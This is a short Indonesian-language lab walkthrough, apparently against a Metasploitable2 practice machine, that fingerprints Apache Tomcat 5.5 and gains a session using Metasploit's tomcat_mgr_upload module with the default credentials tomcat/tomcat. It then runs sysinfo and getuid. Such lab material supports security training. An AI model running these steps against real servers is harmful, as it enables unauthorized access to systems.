- Buka halaman
http://192.168.1.114:8180melalui browser, maka disini dapat dilihat bahwa server tersebut menggunakan apache tomcat versi 5.5
- Buka msfconsole di terminal
msfconsole
- Cari modul untuk exploit apache tomcat versi
5.5
search tomcat 5.5
- Gunakan modul
exploit/multi/http/tomcat_mgr_uploadyang berada di nomor urut 2 dari hasil pencarian
use <nomor_modul>
- Tampilkan daftar parameter yang dibutuhkan di modul tersebut
show options
- Isi parameter yang dibutuhkan di modul tersebut
set rhosts <IP_metasploitable2>
set rport 8180
set HttpUsername tomcat
set HttpPassword tomcat
- Setelah pengisian parameter selesai jalankan modul tersebut. Disini exploit berhasil mengakses masuk ke dalam server
exploit
- Gunakan perintah
sysinfountuk melihat versi sistem operasi server. Ketik perintahgetuiduntuk mengetahui nama user yang berhasil masuk ke server
